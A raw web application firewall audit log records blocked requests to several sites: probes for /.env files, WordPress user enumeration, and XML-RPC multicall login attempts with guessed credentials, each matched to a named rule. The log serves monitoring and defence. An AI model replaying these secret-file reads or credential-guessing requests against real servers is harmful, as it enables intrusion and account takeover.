EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 185.200.240.65 (+1 hits since last alert)|bogl.no|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1749134169110077 5662 (- - -) Stopwatch2: 1749134169110077 5662; combined=4028, p1=496, p2=3361, p3=0, p4=0, p5=103, sr=94, sw=68, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --bb3b6f6c-Z-- --c6ee5a4e-A-- [05/Jun/2025:21:37:29 +0700] aEGrqeth7G2xELALzPZgrAAAAMw 103.236.140.4 36780 103.236.140.4 8181 --c6ee5a4e-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 146.190.29.219 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 146.190.29.219 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0; Keydrop.io/1.0(onlyscans.com/about); Accept: */* --c6ee5a4e-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --c6ee5a4e-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1749134249595971 669 (- - -) Stopwatch2: 1749134249595971 669; combined=262, p1=227, p2=0, p3=0, p4=0, p5=34, sr=71, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --c6ee5a4e-Z-- --ad6e7203-A-- [05/Jun/2025:21:40:22 +0700] aEGsVirHpfaS2Cuwh8UMtAAAAFI 103.236.140.4 36830 103.236.140.4 8181 --ad6e7203-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 38.47.35.83 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 38.47.35.83 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --ad6e7203-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --ad6e7203-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1749134422720712 2901 (- - -) Stopwatch2: 1749134422720712 2901; combined=1421, p1=485, p2=906, p3=0, p4=0, p5=30, sr=89, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --ad6e7203-Z-- --bf0eac67-A-- [05/Jun/2025:21:43:08 +0700] aEGs_Oth7G2xELALzPZgyQAAANc 103.236.140.4 37444 103.236.140.4 8181 --bf0eac67-B-- POST /xmlrpc.php HTTP/1.0 Host: bogl.no X-Real-IP: 208.109.32.135 X-Forwarded-Host: bogl.no X-Forwarded-Server: bogl.no X-Forwarded-For: 208.109.32.135 X-Forwarded-Proto: https Connection: close Content-Length: 487 Accept: */* Accept-Language: ru-RU,ru;q=0.9 Content-Type: application/xml User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36 --bf0eac67-C-- system.multicallmethodNamewp.getUsersBlogsparamsboss229Boss229@2024 --bf0eac67-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --bf0eac67-E-- --bf0eac67-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 208.109.32.135 (+1 hits since last alert)|bogl.no|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1749134588144425 5756 (- - -) Stopwatch2: 1749134588144425 5756; combined=4205, p1=470, p2=3566, p3=0, p4=0, p5=100, sr=85, sw=69, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --bf0eac67-Z-- --e2511d17-A-- [05/Jun/2025:21:46:11 +0700] aEGts-th7G2xELALzPZhRgAAAMs 103.236.140.4 39774 103.236.140.4 8181 --e2511d17-B-- POST /xmlrpc.php HTTP/1.0 Host: bogl.no X-Real-IP: 208.109.32.135 X-Forwarded-Host: bogl.no X-Forwarded-Server: bogl.no X-Forwarded-For: 208.109.32.135 X-Forwarded-Proto: https Connection: close Content-Length: 507 Accept: */* Accept-Language: ru-RU,ru;q=0.9 Content-Type: application/xml User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36 --e2511d17-C-- system.multicallmethodNamewp.getUsersBlogsparamshuzaifasarfaraz2299Huzaifasarfaraz2299@ --e2511d17-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --e2511d17-E-- --e2511d17-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 208.109.32.135 (0+1 hits since last alert)|bogl.no|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1749134771364975 5367 (- - -) Stopwatch2: 1749134771364975 5367; combined=4050, p1=486, p2=3393, p3=0, p4=0, p5=100, sr=91, sw=71, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --e2511d17-Z-- --57af335d-A-- [05/Jun/2025:21:56:33 +0700] aEGwIX-K7ToMdu-YSIJbxgAAAAA 103.236.140.4 43050 103.236.140.4 8181 --57af335d-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 160.119.242.70 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 160.119.242.70 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --57af335d-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --57af335d-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1749135393226625 2032 (- - -) Stopwatch2: 1749135393226625 2032; combined=956, p1=333, p2=595, p3=0, p4=0, p5=28, sr=73, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --57af335d-Z-- --ebc1da40-A-- [05/Jun/2025:22:04:22 +0700] aEGx9n-K7ToMdu-YSIJb6AAAABg 103.236.140.4 43134 103.236.140.4 8181 --ebc1da40-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 196.251.87.59 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 196.251.87.59 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows Phone 8.1; ARM; Trident/7.0; Touch; rv:11.0; IEMobile/11.0; NOKIA; Lumia 530) like Gecko Accept-Charset: utf-8 --ebc1da40-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --ebc1da40-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1749135862443408 801 (- - -) Stopwatch2: 1749135862443408 801; combined=337, p1=279, p2=0, p3=0, p4=0, p5=58, sr=82, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --ebc1da40-Z-- --38163e71-A-- [05/Jun/2025:22:06:37 +0700] aEGyfX-K7ToMdu-YSIJb8QAAAAI 103.236.140.4 43194 103.236.140.4 8181 --38163e71-B-- GET /.env HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 195.178.110.28 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 195.178.110.28 X-Forwarded-Proto: http Connection: close User-agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36 Accept: */* --38163e71-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --38163e71-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1749135997515396 723 (- - -) Stopwatch2: 1749135997515396 723; combined=272, p1=236, p2=0, p3=0, p4=0, p5=36, sr=76, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --38163e71-Z-- --b66b8c36-A-- [05/Jun/2025:22:09:43 +0700] aEGzNyrHpfaS2Cuwh8UN6wAAAFU 103.236.140.4 43266 103.236.140.4 8181 --b66b8c36-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 196.251.87.59 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 196.251.87.59 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13_6) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.1.1 Safari/605.1.15 Accept-Charset: utf-8 --b66b8c36-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --b66b8c36-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1749136183977439 678 (- - -) Stopwatch2: 1749136183977439 678; combined=289, p1=254, p2=0, p3=0, p4=0, p5=35, sr=73, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --b66b8c36-Z-- --a81b4349-A-- [05/Jun/2025:22:09:58 +0700] aEGzRlwdJdhOudw5hdwDaAAAAIY 103.236.140.4 43274 103.236.140.4 8181 --a81b4349-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 196.251.115.46 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 196.251.115.46 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36 Accept-Charset: utf-8 --a81b4349-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --a81b4349-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1749136198885924 721 (- - -) Stopwatch2: 1749136198885924 721; combined=297, p1=262, p2=0, p3=0, p4=0, p5=35, sr=74, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --a81b4349-Z-- --9cd48573-A-- [05/Jun/2025:22:42:26 +0700] aEG64n-K7ToMdu-YSIJccAAAAAY 103.236.140.4 43816 103.236.140.4 8181 --9cd48573-B-- POST /xmlrpc.php HTTP/1.0 Host: bogl.no X-Real-IP: 92.205.20.105 X-Forwarded-Host: bogl.no X-Forwarded-Server: bogl.no X-Forwarded-For: 92.205.20.105 X-Forwarded-Proto: https Connection: close Content-Length: 488 Accept: */* Accept-Language: ru-RU,ru;q=0.9 Content-Type: application/xml User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36 --9cd48573-C-- system.multicallmethodNamewp.getUsersBlogsparamsmarcolau_P@ssw0rd123 --9cd48573-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --9cd48573-E-- --9cd48573-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 92.205.20.105 (+1 hits since last alert)|bogl.no|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1749138146772480 5251 (- - -) Stopwatch2: 1749138146772480 5251; combined=4011, p1=462, p2=3381, p3=0, p4=0, p5=100, sr=85, sw=68, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --9cd48573-Z-- --ce8b2f25-A-- [05/Jun/2025:23:08:14 +0700] aEHA7n-K7ToMdu-YSIJcyAAAAAY 103.236.140.4 44224 103.236.140.4 8181 --ce8b2f25-B-- POST /xmlrpc.php HTTP/1.0 Host: bogl.no X-Real-IP: 92.205.64.28 X-Forwarded-Host: bogl.no X-Forwarded-Server: bogl.no X-Forwarded-For: 92.205.64.28 X-Forwarded-Proto: https Connection: close Content-Length: 482 Accept: */* Accept-Language: ru-RU,ru;q=0.9 Content-Type: application/xml User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36 --ce8b2f25-C-- system.multicallmethodNamewp.getUsersBlogsparamsadminAdmin2233 --ce8b2f25-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --ce8b2f25-E-- --ce8b2f25-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 92.205.64.28 (+1 hits since last alert)|bogl.no|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1749139694961467 4350 (- - -) Stopwatch2: 1749139694961467 4350; combined=3411, p1=362, p2=2886, p3=0, p4=0, p5=96, sr=79, sw=67, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --ce8b2f25-Z-- --3a76da5e-A-- [05/Jun/2025:23:11:46 +0700] aEHBwn-K7ToMdu-YSIJc0gAAABg 103.236.140.4 44290 103.236.140.4 8181 --3a76da5e-B-- POST /xmlrpc.php HTTP/1.0 Host: bogl.no X-Real-IP: 162.241.157.115 X-Forwarded-Host: bogl.no X-Forwarded-Server: bogl.no X-Forwarded-For: 162.241.157.115 X-Forwarded-Proto: https Connection: close Content-Length: 480 Accept: */* Accept-Language: ru-RU,ru;q=0.9 Content-Type: application/xml User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36 --3a76da5e-C-- system.multicallmethodNamewp.getUsersBlogsparamsdemoDemo123* --3a76da5e-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --3a76da5e-E-- --3a76da5e-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 162.241.157.115 (+1 hits since last alert)|bogl.no|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1749139906755516 4860 (- - -) Stopwatch2: 1749139906755516 4860; combined=3674, p1=407, p2=3101, p3=0, p4=0, p5=98, sr=81, sw=68, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --3a76da5e-Z-- --3d9d9831-A-- [05/Jun/2025:23:13:47 +0700] aEHCO1wdJdhOudw5hdwD-QAAAJE 103.236.140.4 44336 103.236.140.4 8181 --3d9d9831-B-- POST /xmlrpc.php HTTP/1.0 Host: bogl.no X-Real-IP: 92.205.64.28 X-Forwarded-Host: bogl.no X-Forwarded-Server: bogl.no X-Forwarded-For: 92.205.64.28 X-Forwarded-Proto: https Connection: close Content-Length: 486 Accept: */* Accept-Language: ru-RU,ru;q=0.9 Content-Type: application/xml User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36 --3d9d9831-C-- system.multicallmethodNamewp.getUsersBlogsparamsmeganMegan1234!@#$ --3d9d9831-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --3d9d9831-E-- --3d9d9831-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 92.205.64.28 (0+1 hits since last alert)|bogl.no|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1749140027446660 5086 (- - -) Stopwatch2: 1749140027446660 5086; combined=3745, p1=382, p2=3176, p3=0, p4=0, p5=110, sr=74, sw=77, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --3d9d9831-Z-- --6cb6743e-A-- [05/Jun/2025:23:22:51 +0700] aEHEW1wdJdhOudw5hdwEBAAAAIg 103.236.140.4 44456 103.236.140.4 8181 --6cb6743e-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 109.108.120.17 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 109.108.120.17 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --6cb6743e-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --6cb6743e-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1749140571008077 3430 (- - -) Stopwatch2: 1749140571008077 3430; combined=1477, p1=519, p2=926, p3=0, p4=0, p5=32, sr=84, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --6cb6743e-Z-- --a5e3f74d-A-- [05/Jun/2025:23:27:26 +0700] aEHFbirHpfaS2Cuwh8UOWAAAAEU 103.236.140.4 44492 103.236.140.4 8181 --a5e3f74d-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 196.251.86.80 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 196.251.86.80 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/73.0.3683.103 Safari/537.36 OPR/60.0.3255.70 Accept-Charset: utf-8 --a5e3f74d-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --a5e3f74d-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1749140846396762 752 (- - -) Stopwatch2: 1749140846396762 752; combined=286, p1=249, p2=0, p3=0, p4=0, p5=37, sr=75, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --a5e3f74d-Z-- --5cdd640b-A-- [05/Jun/2025:23:27:30 +0700] aEHFcuth7G2xELALzPZiaQAAAMI 103.236.140.4 44494 103.236.140.4 8181 --5cdd640b-B-- GET /.env.save HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 196.251.85.66 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 196.251.85.66 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Linux; Android 9; SAMSUNG SM-G965U Build/PPR1.180610.011) AppleWebKit/537.36 (KHTML, like Gecko) SamsungBrowser/9.0 Chrome/67.0.3396.87 Mobile Safari/537.36 Accept-Charset: utf-8 --5cdd640b-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --5cdd640b-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1749140850845651 29871 (- - -) Stopwatch2: 1749140850845651 29871; combined=58680, p1=226, p2=0, p3=0, p4=0, p5=29244, sr=66, sw=0, l=0, gc=29210 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --5cdd640b-Z-- --feb0ae61-A-- [05/Jun/2025:23:36:58 +0700] aEHHqirHpfaS2Cuwh8UOXwAAAFM 103.236.140.4 44630 103.236.140.4 8181 --feb0ae61-B-- POST /xmlrpc.php HTTP/1.0 Host: bogl.no X-Real-IP: 103.180.134.27 X-Forwarded-Host: bogl.no X-Forwarded-Server: bogl.no X-Forwarded-For: 103.180.134.27 X-Forwarded-Proto: https Connection: close Content-Length: 484 Accept: */* Accept-Language: ru-RU,ru;q=0.9 Content-Type: application/xml User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36 --feb0ae61-C-- system.multicallmethodNamewp.getUsersBlogsparamssophieSophie123+ --feb0ae61-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --feb0ae61-E-- --feb0ae61-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 103.180.134.27 (+1 hits since last alert)|bogl.no|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1749141418065240 5619 (- - -) Stopwatch2: 1749141418065240 5619; combined=3967, p1=462, p2=3339, p3=0, 